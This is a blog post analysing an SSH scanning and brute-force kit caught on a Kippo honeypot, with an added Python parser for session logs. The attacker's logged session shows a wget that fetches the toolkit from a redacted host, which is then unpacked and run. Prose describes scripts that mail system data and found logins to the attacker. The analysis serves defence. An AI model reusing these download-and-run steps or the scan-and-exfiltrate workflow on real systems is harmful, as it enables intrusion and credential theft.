Fun With a SSH Honeypot (Kippo)

A few months back I ran a Kippo honeypot for a while. Kippo is an SSH honeypot; you can find your own copy at https://code.google.com/p/kippo/. Most of the time I didn't see anything apart from port scans and large numbers of failed login attempts. But sometimes I woke up, logged into my server and saw that I had caught some goodies. This post analyses one of those goodies.

Before we start: this is a common SSH scanning kit, and this collection has been analysed by a fair bunch of people. Yet I couldn't really find the detailed description I was looking for, so I thought I'd write one. The tools themselves are not really impressive. In this case the attacker didn't even bother hiding his/her activities. The kit launches verbose tools that you would definitely notice if you were paying attention to your system.

Let's start with the Kippo log our intruder created.

damnsecure:~# perl
bash: perl: command not found
damnsecure:~# http://<redacted>.com/gosh.tgz
bash: http://<redacted>.com/gosh.tgz: command not found
damnsecure:~# wget http://<redacted>.com/gosh.tgz
--2013-02-05 00:49:15--  http://<redacted>.com/gosh.tgz
Connecting to <redacted>.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 680051 (664K) [application/x-tar]
Saving to: `gosh.tgz

100%[======================================>] 680,051      219K/s  eta 0s  

2013-02-05 00:49:18 (219 KB/s) - `gosh.tgz' saved [680051/680051]
damnsecure:~# tar xfzv gosh.tgz
gosh
gosh/gen-pass.sh
gosh/common
gosh/scam
gosh/pscan2
gosh/mfu.txt
gosh/secure
gosh/go.sh
gosh/ssh-scan
gosh/ss
gosh/pass_file
gosh/a
gosh/vuln.txt
damnsecure:~# cd gosh
damnsecure:~/gosh# chmode +x *(
bash: chmode: command not found
damnsecure:~/gosh# chmode +x *
bash: chmode: command not found
damnsecure:~/gosh# chmod +x *
damnsecure:~/gosh# ./scam
  ___ 
 {o,o}
 |)__)
 -"-"-
O RLY?

Nothing really interesting. In short, what happened:

  1. The user found a successful SSH login on my honeypot.

  2. Downloaded the toolkit.

  3. It crashed and burned since it is a simulated environment. The attacker realised this and left.
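To pull this kind of timeline out of a Kippo session without reading it by hand, here is an added example (not part of the original post, and not Kippo's own code) that parses a Kippo-style transcript and lists what was downloaded, unpacked and executed, plus which commands failed. The "<host>:<cwd># command" prompt format and the trimmed sample transcript are assumptions taken from the log above.

```python
import re

# Constructed sample: a trimmed copy of the Kippo session above, host redacted.
SAMPLE_SESSION = """damnsecure:~# perl
bash: perl: command not found
damnsecure:~# http://<redacted>.com/gosh.tgz
bash: http://<redacted>.com/gosh.tgz: command not found
damnsecure:~# wget http://<redacted>.com/gosh.tgz
--2013-02-05 00:49:15--  http://<redacted>.com/gosh.tgz
2013-02-05 00:49:18 (219 KB/s) - `gosh.tgz' saved [680051/680051]
damnsecure:~# tar xfzv gosh.tgz
gosh/scam
damnsecure:~# cd gosh
damnsecure:~/gosh# chmode +x *
bash: chmode: command not found
damnsecure:~/gosh# chmod +x *
damnsecure:~/gosh# ./scam
O RLY?
"""

# A Kippo prompt looks like "<host>:<cwd># <command>"; everything else is output.
PROMPT_RE = re.compile(r"^(?P<host>[\w.-]+):(?P<cwd>\S*)[#$] (?P<cmd>.*)$")
URL_RE = re.compile(r"https?://\S+")

def parse_session(text):
    # Split the transcript into one record per typed command, with its output.
    records = []
    for line in text.splitlines():
        m = PROMPT_RE.match(line)
        if m:
            records.append({"cwd": m.group("cwd"), "cmd": m.group("cmd"), "out": []})
        elif records:
            records[-1]["out"].append(line)
    return records

def summarise(records):
    # What a defender wants: fetched, unpacked, run, and failed (tooling or typos).
    summary = {"downloads": [], "extracted": [], "executed": [], "failed": []}
    for r in records:
        words = r["cmd"].split()
        tool = words[0] if words else ""
        if tool in ("wget", "curl"):
            summary["downloads"] += URL_RE.findall(r["cmd"])
        elif tool == "tar" and len(words) > 2:
            summary["extracted"].append(words[-1])
        elif tool.startswith("./"):
            summary["executed"].append(r["cwd"] + "/" + tool[2:])
        if any(o.endswith("command not found") for o in r["out"]):
            summary["failed"].append(tool)
    return summary
```

Run over the full session the same way, the "failed" list makes the attacker's missing perl and the chmode typos stand out at a glance.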

Now this is a very small collection of files (12 files). This is a short description of what every file does:

gosh/gen-pass.sh: Creates a <username> <password> file, where the username is the first argument and the second argument is a password dictionary file. I don't really understand why this file is in this kit, mainly because it is something I would do on my own system and then distribute the dictionaries. The file is probably here because this is quite a standard SSH scanning kit and it is distributed with this bash file.

gosh/common: Dictionary with 3343 passwords. I think this file is shipped by default with this kit by its creator.

gosh/scam: This file is launched by the attacker (see the Kippo log).

It kicks off by collecting basic system info (ifconfig, uptime, uname, /etc/issue, /etc/passwd, id, df -h) and emails it to the attacker.

Then it starts another bash file called 'a' with one argument '$1.x', where $1 is the first byte of the IP address and x is simply a counter. So in total 'a' is launched 255 times.

gosh/a: This is the script that takes care of a large set of IPs.

  1. Launches pscan2 with arguments $1.x <B class> $2 <port number, 22>. This creates a list of IPs in $1.pscan.22. pscan2 runs to completion.

  2. After this $1.pscan.22 is sorted and a unique list of the output is saved into mfu.txt.

  3. ssh-scan gets launched with parameter 100 (I don't really know what the 100 here means; my binary reversing skills are not very good). The results of ssh-scan are added to vuln.txt, which gets emailed to the attacker.

  4. $1.pscan.22 and mfu.txt get removed.

After this the scam script launches the same script for the next B class, $1.x+1.

gosh/pscan2: As far as I can see and find on the interwebs, pscan2 is a basic port scanner. The source code for quite a similar piece of software can be found here: http://calebcoffie.com/honeypot-treasure-6-ssh-bruteforcer-in-c/. This file is used by one of the bash scripts ('a') to launch a scanner that checks for a running service on port 22.

gosh/mfu.txt: Pretty sure this file contains a list of IPs with an active SSH service running on port 22.

gosh/secure: Removes execution rights from /usr/bin/mail (chmod -x /usr/bin/mail) and then moves it to /usr/bin/s8. It seems like this file isn't used in any of the automated scripts. What I don't understand (maybe one of you can answer this for me) is why this script is added to this kit, mainly because the mail binary is used in every other script. Making the mail binary unavailable would break basically every script in this tgz file...

gosh/go.sh: Another launch script. Launches 'ss' and ssh-scan. Not really sure if this is used.

  1. Launches 'ss' with arguments 22 -a $1 -i eth0 -s 7: port 22, B class, interface and speed (1-10, slow to fastest). The output is saved in 'bios.txt'.

  2. Creates a unique list of IPs and saves it into mfu.txt.

  3. Launches ssh-scan

  4. Removes bios.txt

gosh/ssh-scan: I think this is the SSH brute-force login scanner. Successful logins are saved into vuln.txt, I think.

gosh/ss: I think this file simply scans a port to grab the banner. This way the attacker can filter out vulnerable SSH installations. It is used in 'a' as you can see above.

gosh/pass_file: This is a default list with logins. It contains 3777 unique usernames and 6098 unique passwords.

gosh/vuln.txt: List of vulnerable hosts generated by ssh-scan.


Now this is the first time I did any type of analysis on a piece of malicious software, so if I got anything wrong, please do leave a message.

In case you were wondering whether I looked into the attacker: I did find a gaming site where it seemed like his/her email was used to register. Also, I noticed the IP of origin was in Romania, which gave me the impression that no proxy was used. I decided not to publish the attacker's details for obvious reasons.

I hope you enjoyed this quick write up.

Signature: MD5 (a) = 8883ef6b3f4016c3e0cea2fc2546268a

MD5 (common) = d32a54466abc11b2daae68f60d5d0967

MD5 (gen-pass.sh) = 615c08bb1acdf2f21490450991766187

MD5 (go.sh) = 212f1bc330064d2360fb2d662c7d6124

MD5 (mfu.txt) = d41d8cd98f00b204e9800998ecf8427e

MD5 (pass_file) = 63e9d967580829bd7e5b51487540d4fe

MD5 (pscan2) = acba0143d0cbcf8092b8b44d914d7983

MD5 (scam) = 5b10eaf79949cd46d002cb9d73b5eb1a

MD5 (secure) = 39acbfc1e983e45308cdab2d3ec4bf34

MD5 (ss) = b51a52c9c82bb4401659b4c17c60f89f

MD5 (ssh-scan) = a213ebd69fbc11d612d0374b373f65d8

MD5 (vuln.txt) = d41d8cd98f00b204e9800998ecf8427e
